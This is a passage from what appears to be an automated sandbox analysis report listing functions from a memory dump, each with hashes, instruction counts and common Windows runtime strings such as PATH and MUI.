                                                • Source File: 0000001D.00000002.534968805.00000000012B0000.00000040.00000001.sdmp, Offset: 012B0000, based on PE: true
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID: Legacy$UEFI
                                                • API String ID: 2994545307-634100481
                                                • Opcode ID: 059e57a51647bdfdb04862d200ba38195bcb0b7f456a6eb2d06706c67e418a7a
                                                • Instruction ID: 36b10111d1ae38c2bff3be4e7ba605b123a48cab1df70167522c5fc963e09520
                                                • Opcode Fuzzy Hash: 059e57a51647bdfdb04862d200ba38195bcb0b7f456a6eb2d06706c67e418a7a
                                                • Instruction Fuzzy Hash: D6516F71A106099FDB54DFA8C890FADBBF8FF48B48F14402DEA49EB652D671A940CB50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 012E61A7, Relevance: 2.6, Strings: 2, Instructions: 115COMMON
                                                Download Yara Rule
                                                Strings
                                                • RtlpResUltimateFallbackInfo Exit, xrefs: 012E61DD
                                                • RtlpResUltimateFallbackInfo Enter, xrefs: 012E61CE
                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.534968805.00000000012B0000.00000040.00000001.sdmp, Offset: 012B0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                • API String ID: 0-2876891731
                                                • Opcode ID: 9d91330045fdde0370e9d14464c0888b2434f68885be88b1d5e28d6cd1781786
                                                • Instruction ID: 61d9e1f26e0ad18bdea176bca8e772dfb1f072b9887d0fd0eeac902cb9f77239
                                                • Opcode Fuzzy Hash: 9d91330045fdde0370e9d14464c0888b2434f68885be88b1d5e28d6cd1781786
                                                • Instruction Fuzzy Hash: B941D271A20245DBEB11DFA9D848B7ABBF4FF90308F1440A9EA00DB391E775D900CB55
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 012EC1C0, Relevance: 2.1, Strings: 1, Instructions: 876COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.534968805.00000000012B0000.00000040.00000001.sdmp, Offset: 012B0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID: MUI
                                                • API String ID: 0-1339004836
                                                • Opcode ID: dc04b9628f24ec404a127b353b7c49cc9005f8c0b390e07979ab40d082bce74a
                                                • Instruction ID: 4e8f35715c3d689c0f6be77f4671d3f6169f642a35fe1fa5c55f7f8c759cb463
                                                • Opcode Fuzzy Hash: dc04b9628f24ec404a127b353b7c49cc9005f8c0b390e07979ab40d082bce74a
                                                • Instruction Fuzzy Hash: E572DE75E2021ACFDB25CFA8C8887ADBBF1BF88304F54816AD949AB341D7709991CF50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0137EB8A, Relevance: 1.8, Strings: 1, Instructions: 599COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.534968805.00000000012B0000.00000040.00000001.sdmp, Offset: 012B0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID: @
                                                • API String ID: 0-2766056989
                                                • Opcode ID: 85546f8f679f897095ab184aa662d3dba69f30ae2b6f27ebc314c81b53809089
                                                • Instruction ID: 52e2a2dd487012bb9a7b4c26b18e057d958eacc4ae199d8750d338f96d445b93
                                                • Opcode Fuzzy Hash: 85546f8f679f897095ab184aa662d3dba69f30ae2b6f27ebc314c81b53809089
                                                • Instruction Fuzzy Hash: 5232E474204655DFEB35CF2DC090372BBE5BF05308F0888AAD9968FA86D339E456DB61
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 012FB944, Relevance: 1.7, APIs: 1, Instructions: 166COMMON
                                                Download Yara Rule
                                                APIs
                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 012FB9A5
                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.534968805.00000000012B0000.00000040.00000001.sdmp, Offset: 012B0000, based on PE: true
                                                Similarity
                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                • String ID:
                                                • API String ID: 885266447-0
                                                • Opcode ID: d0fcbab2369c9204a9d338dbce56d4053c8e0e9bef5c32a5d97d019c5fcdcce5
                                                • Instruction ID: 429c009959ebd91125c6180837b564d0607b334b04cbe2cfe5c0fe77cbea3ffd
                                                • Opcode Fuzzy Hash: d0fcbab2369c9204a9d338dbce56d4053c8e0e9bef5c32a5d97d019c5fcdcce5
                                                • Instruction Fuzzy Hash: 13515671A28342CFC720CF2DC48092AFBE9FB88614F14896EFA9597355D770E844CB92
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 01302581, Relevance: 1.6, Strings: 1, Instructions: 329COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.534968805.00000000012B0000.00000040.00000001.sdmp, Offset: 012B0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID: PATH
                                                • API String ID: 0-1036084923
                                                • Opcode ID: 59d8f70157325ee59c44f88f552f0850054e01c26343af492db323ead51d33e6
                                                • Instruction ID: 2f09d6f1c7fa9992d15f8f8fe832785fca934466c4935828652b622f7394c36e
                                                • Opcode Fuzzy Hash: 59d8f70157325ee59c44f88f552f0850054e01c26343af492db323ead51d33e6
                                                • Instruction Fuzzy Hash: 5BC1AE71D00219DFDB26DF99C894ABEBBF9FF48718F184029E901BB290D774A901CB60
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0130FAB0, Relevance: 1.6, Strings: 1, Instructions: 306COMMON
                                                Download Yara Rule
                                                Strings
                                                • *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 0134BE0F
                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.534968805.00000000012B0000.00000040.00000001.sdmp, Offset: 012B0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!
                                                • API String ID: 0-865735534
                                                • Opcode ID: 80c9cfd6de2dce4b4196737281d34fc3a5cf710b13acfb4d2519382fe34f53e4
                                                • Instruction ID: 3e174d8cea196cd0f075993a59d9059cd8e61773f6d8210de0d95c85412546cc
                                                • Opcode Fuzzy Hash: 80c9cfd6de2dce4b4196737281d34fc3a5cf710b13acfb4d2519382fe34f53e4
                                                • Instruction Fuzzy Hash: 61A1F371B00A068BEB36DF6CC46577AB7E9AF48718F044569EA46CB6C4DB30E841CB90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 012D2D8A, Relevance: 1.4, Strings: 1, Instructions: 191COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.534968805.00000000012B0000.00000040.00000001.sdmp, Offset: 012B0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID: RTL: Re-Waiting
                                                • API String ID: 0-316354757
                                                • Opcode ID: 13ab57f887ebcaf471dd97668e86b3b5937b1530ba462d83fc5307e2706d6a91
                                                • Instruction ID: 08515dd8aee2a057e1528a34e58aa51c1b4d4b8c8bd0c50b605f7348124154cd
                                                • Opcode Fuzzy Hash: 13ab57f887ebcaf471dd97668e86b3b5937b1530ba462d83fc5307e2706d6a91
                                                • Instruction Fuzzy Hash: A6613531A10655EFEB32EF6CC850B7EBBB9EF44718F144669DA11A72C1C774AD008B91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0130F0BF, Relevance: 1.4, Strings: 1, Instructions: 137COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.534968805.00000000012B0000.00000040.00000001.sdmp, Offset: 012B0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID: @
                                                • API String ID: 0-2766056989
                                                • Opcode ID: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                                • Instruction ID: 24f90bdc159f6dd74716fe0ad4d863ebcd5815c1bd5473b488161e51bcef2482
                                                • Opcode Fuzzy Hash: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                                • Instruction Fuzzy Hash: 09517871604711AFD325DF29C840A6BBBF8FF48714F00892EFA9597690E7B4E914CB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 01353540, Relevance: 1.4, Strings: 1, Instructions: 130COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.534968805.00000000012B0000.00000040.00000001.sdmp, Offset: 012B0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID: BinaryHash
                                                • API String ID: 0-2202222882
                                                • Opcode ID: 1dd790a1951c9e8b15a7a4aa115119b924773cd42f4550a0a96ff1ee5fe8d098
                                                • Instruction ID: 3e8a48e56d06dc7e4f4f6d8ea7c1a9c4818b2bd8274d570f5918030f70720845
                                                • Opcode Fuzzy Hash: 1dd790a1951c9e8b15a7a4aa115119b924773cd42f4550a0a96ff1ee5fe8d098
                                                • Instruction Fuzzy Hash: 634157F2D0052D9BDB61DA54CC80FDEB77CAB54768F0045A5EA09A7240DB309E88CFA4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 013A05AC, Relevance: 1.4, Strings: 1, Instructions: 115COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.534968805.00000000012B0000.00000040.00000001.sdmp, Offset: 012B0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID: `
                                                • API String ID: 0-2679148245
                                                • Opcode ID: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                                                • Instruction ID: 043ab483b9b0ab0e2b404a24efb829e19b6f8a8e0d55e2e6e39c7ae8a6e1a035
                                                • Opcode Fuzzy Hash: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                                                • Instruction Fuzzy Hash: C53102326043066BE724DE28CD84F9B7BD9EBC476CF144229FA58AB290D770E904CB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 01304020, Relevance: 1.4, Strings: 1, Instructions: 110COMMON
                                                Download Yara Rule
                                                Strings
                                                • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 013040E8
                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.534968805.00000000012B0000.00000040.00000001.sdmp, Offset: 012B0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode
                                                • API String ID: 0-996340685
                                                • Opcode ID: bab65c7240f40c9829ad1b82f3a8f6ab0ad2e2e8e7dad419249ffa585cdf23f4
                                                • Instruction ID: b4a87e3bcf0b5d69f75e9651e7b0048ce60614e439e35f7b06adac9ace7b6956
                                                • Opcode Fuzzy Hash: bab65c7240f40c9829ad1b82f3a8f6ab0ad2e2e8e7dad419249ffa585cdf23f4
                                                • Instruction Fuzzy Hash: B9418375A0074A9BD72ADFB8C4516E7F7F8EF19304F00482ED6AAD3680E330A644CB95
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 01353884, Relevance: 1.3, Strings: 1, Instructions: 95COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.534968805.00000000012B0000.00000040.00000001.sdmp, Offset: 012B0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID: BinaryName
                                                • API String ID: 0-215506332
                                                • Opcode ID: 548b49246cbcc058d9b39c2b09d8be5e02d99ae4e08cacef18c23bc0ec962074
                                                • Instruction ID: ada5ed243994cd4204d7a3badc3de6aaf5146d9e9d7e31ddae6231f011a7abf6
                                                • Opcode Fuzzy Hash: 548b49246cbcc058d9b39c2b09d8be5e02d99ae4e08cacef18c23bc0ec962074
                                                • Instruction Fuzzy Hash: 1A31E3B290051AAFEB15DA5CC945E7BFB78FF80BA8F014169ED14A7250D7309E04C7E0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0130D294, Relevance: 1.3, Strings: 1, Instructions: 93COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.534968805.00000000012B0000.00000040.00000001.sdmp, Offset: 012B0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID: @
                                                • API String ID: 0-2766056989
                                                • Opcode ID: f75a5cb950bc62e2c9cae29a10400812d01c6aa25141ed1ddc4a474e76e5ebe0
                                                • Instruction ID: 802796bc9e5b4ac3d37ccef8c5a449e89077f3a33e8807b8e924f152aa60e552
                                                • Opcode Fuzzy Hash: f75a5cb950bc62e2c9cae29a10400812d01c6aa25141ed1ddc4a474e76e5ebe0
                                                • Instruction Fuzzy Hash: 1131A4B15083059FC312DFA8C990A6BFBE8FB95758F00096EF99593690D634DD05CB92
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 012E1B8F, Relevance: 1.3, Strings: 1, Instructions: 86COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.534968805.00000000012B0000.00000040.00000001.sdmp, Offset: 012B0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID: WindowsExcludedProcs
                                                • API String ID: 0-3583428290
                                                • Opcode ID: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                                • Instruction ID: 26fc1a5eb9250c7850e930a7bef709bde864e42985063a3bc749eec299d5c858
                                                • Opcode Fuzzy Hash: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                                • Instruction Fuzzy Hash: CC21497B511629ABDB229A5DC944F6BBBEDEF80A14F054075FF04CB200D630DD20C7A1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 013A5BA5, Relevance: .6, Instructions: 592COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.534968805.00000000012B0000.00000040.00000001.sdmp, Offset: 012B0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e1d37230083dc78bbbbaef357f7d2f00308cbe9facd27e0a3eb715c22d17a1ce
                                                • Instruction ID: 71e2dd13d18571e2508284930eac5eeaadf1b9ea488b27db6366d064c094b21d
                                                • Opcode Fuzzy Hash: e1d37230083dc78bbbbaef357f7d2f00308cbe9facd27e0a3eb715c22d17a1ce
                                                • Instruction Fuzzy Hash: 6F426DB5900229CFDB24CF68C881BA9BBB5FF45308F5881AAD94DEB352D7349985CF50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 01395A4F, Relevance: .6, Instructions: 581COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.534968805.00000000012B0000.00000040.00000001.sdmp, Offset: 012B0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 37f344bdad042795f0ebb2a67446f60bfd21607fbf495766c33941b8ab16f94f
                                                • Instruction ID: 3018fec5c740cfb55dc01c0f092af8697db511a97e97410833159c200b6a29cc
                                                • Opcode Fuzzy Hash: 37f344bdad042795f0ebb2a67446f60bfd21607fbf495766c33941b8ab16f94f
                                                • Instruction Fuzzy Hash: 80226235A012168FDF1ACF5DC4906BEB7B2BF88318F24856ED9559B341DB34A982CB90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 013960F5, Relevance: .6, Instructions: 558COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.534968805.00000000012B0000.00000040.00000001.sdmp, Offset: 012B0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 16d8013726a05c8f1826186b2f6a170ac8a8f2833be7d80f1e63c7c73c0d898c
                                                • Instruction ID: f1017cf30f8eb90bf9d31dc36307e012932f63361692a9c4763f6fddfc771ed5
                                                • Opcode Fuzzy Hash: 16d8013726a05c8f1826186b2f6a170ac8a8f2833be7d80f1e63c7c73c0d898c
                                                • Instruction Fuzzy Hash: CF22A2B16053118FDB19CF18C491A2AB7E2FFC8318F148A6DE996DB395D734E846CB81
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 012F4120, Relevance: .4, Instructions: 444COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.534968805.00000000012B0000.00000040.00000001.sdmp, Offset: 012B0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d135fe116cc5f3efa15cc3045a00fdfbd23cf8ddd62524527ad51c4a74105fe2
                                                • Instruction ID: 9bdc5a47e2624330bcde77eed95c987c863b8cfc645f422202e622aa7b425ae0
                                                • Opcode Fuzzy Hash: d135fe116cc5f3efa15cc3045a00fdfbd23cf8ddd62524527ad51c4a74105fe2
                                                • Instruction Fuzzy Hash: 85F17C746282528BD724EF18C481A7BF7E1EF98718F14493EF686CB250E7B4D885CB52
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 013020A0, Relevance: .4, Instructions: 420COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.534968805.00000000012B0000.00000040.00000001.sdmp, Offset: 012B0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 97c4da104fba3cbd18a36c1a881ccb58e69eb2f3d705d25e1c92456dda30cb5d
                                                • Instruction ID: eb6648f03be15e05a5d5e152d6e8a3e7a624c369d451abf7cc1fc5da6dacf2fc
                                                • Opcode Fuzzy Hash: 97c4da104fba3cbd18a36c1a881ccb58e69eb2f3d705d25e1c92456dda30cb5d
                                                • Instruction Fuzzy Hash: 3AF1D235A083419FEB27CB2CC45476B7BE9AF8572CF04855DE9998B381D734E841CB82
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 012D6800, Relevance: .4, Instructions: 373COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.534968805.00000000012B0000.00000040.00000001.sdmp, Offset: 012B0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 2ef0d3585bbf870c395db5a3596892d930178545dfedb400f4595a1cc123d426
                                                • Instruction ID: 9431087e745b67c2b3d8f5de68c2c5094c01c67aa54658983b3fbc634c24c914
                                                • Opcode Fuzzy Hash: 2ef0d3585bbf870c395db5a3596892d930178545dfedb400f4595a1cc123d426
                                                • Instruction Fuzzy Hash: 7FD1B071A202069FCB18DF68C891AFEB7B4EF54718F04852DE956DB280F774E945CBA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 013065A0, Relevance: .4, Instructions: 368COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.534968805.00000000012B0000.00000040.00000001.sdmp, Offset: 012B0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 538c67e41e5a42884b726db2c8dfd19beb7c3dd447c0294e6e0d27e7e319b589
                                                • Instruction ID: faf30bfe813e464a303394ae13f9a4c99e8f740e495d10679a8b06bc4861f714
                                                • Opcode Fuzzy Hash: 538c67e41e5a42884b726db2c8dfd19beb7c3dd447c0294e6e0d27e7e319b589
                                                • Instruction Fuzzy Hash: A0E1B3B5A00109CFCB19CF58C891BA9BBF5FF48314F188169E955EB395D734EA81CBA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 012D3ACA, Relevance: .3, Instructions: 348COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.534968805.00000000012B0000.00000040.00000001.sdmp, Offset: 012B0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 08dae2e5c28247f6b40988188bc12583eb41777bffa54ce43f6ddcd553dbecb3
                                                • Instruction ID: aa94ac90818edf67933f2feab136bff9589b3e371ce9a97ea06f29830f9381e1
                                                • Opcode Fuzzy Hash: 08dae2e5c28247f6b40988188bc12583eb41777bffa54ce43f6ddcd553dbecb3
                                                • Instruction Fuzzy Hash: 30E112B1E20608DFCB25CFA9C984AADFBF5FF48314F24452AE646A7261D770A841CF11
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 012FB236, Relevance: .3, Instructions: 305COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.534968805.00000000012B0000.00000040.00000001.sdmp, Offset: 012B0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: ea1f64df11345c03254a0bdf0ea8c13923360817a481ea98dccb31031b519ceb
                                                • Instruction ID: fdbf90387394b10f1e6637cedb068efc3f1499c251772ce6bdb6579823455261
                                                • Opcode Fuzzy Hash: ea1f64df11345c03254a0bdf0ea8c13923360817a481ea98dccb31031b519ceb
                                                • Instruction Fuzzy Hash: 63B1AD35A2060A9BEB15DBA9C890B7EBBEAEF88204F144179E742D7381D770E941CB50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0130513A, Relevance: .3, Instructions: 258COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.534968805.00000000012B0000.00000040.00000001.sdmp, Offset: 012B0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4a3704bc32d9ddae91d55e9705cbaa55a0b98e8948c232a271ab2c21f57bf620
                                                • Instruction ID: 76ac8478e94ba345c1e699bc93a33d9af48da354e3b3d57d8b71a4a47462486b
                                                • Opcode Fuzzy Hash: 4a3704bc32d9ddae91d55e9705cbaa55a0b98e8948c232a271ab2c21f57bf620
                                                • Instruction Fuzzy Hash: 37C122B55083818FD355CF28C580A5AFBE1BF89308F14496EF9998B392D771E885CB42
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 013003E2, Relevance: .3, Instructions: 254COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.534968805.00000000012B0000.00000040.00000001.sdmp, Offset: 012B0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 3a7eb729121eb0577aff84772ade5c5773151f54809dab0fcf33a120318d7d69
                                                • Instruction ID: 3a08e3822d757d6926435689cf09f82636351eefcdf9261dc55c02d056fc72f0
                                                • Opcode Fuzzy Hash: 3a7eb729121eb0577aff84772ade5c5773151f54809dab0fcf33a120318d7d69
                                                • Instruction Fuzzy Hash: 7A914831E04259AFEB369B6CC854BADBBE8AB0176CF050271FA50B72D1D774AD00CB85
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0130DA88, Relevance: .3, Instructions: 253COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.534968805.00000000012B0000.00000040.00000001.sdmp, Offset: 012B0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 63da6c5321f60b060927219fca6a56cef8f64c0f9e69545597acdde35e4e82dd
                                                • Instruction ID: 3eb6570e0620c074c32d13c87df2f47f72014992ad969ef919bf4955ea00a422
                                                • Opcode Fuzzy Hash: 63da6c5321f60b060927219fca6a56cef8f64c0f9e69545597acdde35e4e82dd
                                                • Instruction Fuzzy Hash: 0FA177B4A046098FDF26CFECC8A57A9BBE5BF0831CF144159D9119B2D6D770E882CB90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 012D5AC0, Relevance: .2, Instructions: 222COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.534968805.00000000012B0000.00000040.00000001.sdmp, Offset: 012B0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 34fd2b9626afae08e9e8856ef7f64059cd9d937e9e815f97ad670e77b300143c
                                                • Instruction ID: 93e0a7b19d481f40c7b14924f2eded00a33d73ae3969b69185aa605b2994d5aa
                                                • Opcode Fuzzy Hash: 34fd2b9626afae08e9e8856ef7f64059cd9d937e9e815f97ad670e77b300143c
                                                • Instruction Fuzzy Hash: FA81BAB1A101199BDB358A1CCD40BEAB7B8EF84318F0445A9DB15E3295E7B4DDC1CBA8
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0130138B, Relevance: .2, Instructions: 206COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.534968805.00000000012B0000.00000040.00000001.sdmp, Offset: 012B0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 1c33f6d9e34d70ec2c7411a2d2e90e11e394967e8af468a76c92d51e73907bb8
                                                • Instruction ID: 00b668662756267983f35e9ec1332919c35a4186c3ddb4537ff0e1197bab1d8f
                                                • Opcode Fuzzy Hash: 1c33f6d9e34d70ec2c7411a2d2e90e11e394967e8af468a76c92d51e73907bb8
                                                • Instruction Fuzzy Hash: 1F818B71A00346DFCB25CF68C490BAABBF5EF48314F14856AE956D7791D330EA41CBA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0139B2E8, Relevance: .2, Instructions: 206COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.534968805.00000000012B0000.00000040.00000001.sdmp, Offset: 012B0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: bcb1e80b99a1eea359d56aa01ff11e17088b1afbe5adc19662dcf9eadea38a19
                                                • Instruction ID: 96cd5e19f2072aa569d8e939f0a3f99d3a5054d319ddd1a765c0a3b4425f11fa
                                                • Opcode Fuzzy Hash: bcb1e80b99a1eea359d56aa01ff11e17088b1afbe5adc19662dcf9eadea38a19
                                                • Instruction Fuzzy Hash: 0371BF72104741AFDB15DFA9C884A6BBFE8EF88748F04456DFD499B259D630D808CBA2
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0136B8D0, Relevance: .2, Instructions: 199COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.534968805.00000000012B0000.00000040.00000001.sdmp, Offset: 012B0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d4209b8e0251aac88f0d648e786e3cf9cc140504697d59a43498e53ad9a43660
                                                • Instruction ID: 7758694ec04dde8da1f331d044031a3d02817fbf3fd370f2e81c369e6d39b240
                                                • Opcode Fuzzy Hash: d4209b8e0251aac88f0d648e786e3cf9cc140504697d59a43498e53ad9a43660
                                                • Instruction Fuzzy Hash: 4E71EC32340706EFE7369F18C844F6AFBE9EB40728F148528E655DB6A8DB75E940CB50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 012EF370, Relevance: .2, Instructions: 194COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.534968805.00000000012B0000.00000040.00000001.sdmp, Offset: 012B0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c64cf6325cd1c38f601fe2ffb4d79a0aa2d502ca657382b990673b8ff0efa87b
                                                • Instruction ID: 65bf5d5f760afae7afbe9e623780541f316669477ffa030c70757e5e61479b8e
                                                • Opcode Fuzzy Hash: c64cf6325cd1c38f601fe2ffb4d79a0aa2d502ca657382b990673b8ff0efa87b
                                                • Instruction Fuzzy Hash: E0612132A202568FCB25CF5CC5856BABBF1EF85300F9880A9EA49DF345DB34D942C790
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 012D395E, Relevance: .2, Instructions: 172COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.534968805.00000000012B0000.00000040.00000001.sdmp, Offset: 012B0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 13e9cb9b12e4a0741ea3741422769b61454c72f688c7b19b0273face1aabe081
                                                • Instruction ID: 7c04afa1ff0e89e6ace3546489f4d4ee92726db3de7e4f7216af84634bfcfc23
                                                • Opcode Fuzzy Hash: 13e9cb9b12e4a0741ea3741422769b61454c72f688c7b19b0273face1aabe081
                                                • Instruction Fuzzy Hash: 58517DB1B207469FDB35DF99C884A7AF7E8FB94319F10482DE14687651C7B4E844CB82
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 012DB171, Relevance: .2, Instructions: 166COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.534968805.00000000012B0000.00000040.00000001.sdmp, Offset: 012B0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 6e013d8ec50cb542f4f9552f3850be8c5916c970545f1dbeb76493231884b772
                                                • Instruction ID: 48ff2c2669a7a4596ce2215f19524f5bb10d6ef005cf8ec24ff3865b4a9a6be7
                                                • Opcode Fuzzy Hash: 6e013d8ec50cb542f4f9552f3850be8c5916c970545f1dbeb76493231884b772
                                                • Instruction Fuzzy Hash: F6510271D0025A8EEF35CF78C844BAEBFB0BF85318F1041ADD859AB282D7754941CB95
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 012D52A5, Relevance: .2, Instructions: 161COMMON
                                                Download Yara Rule
                                                Memory Dump Source
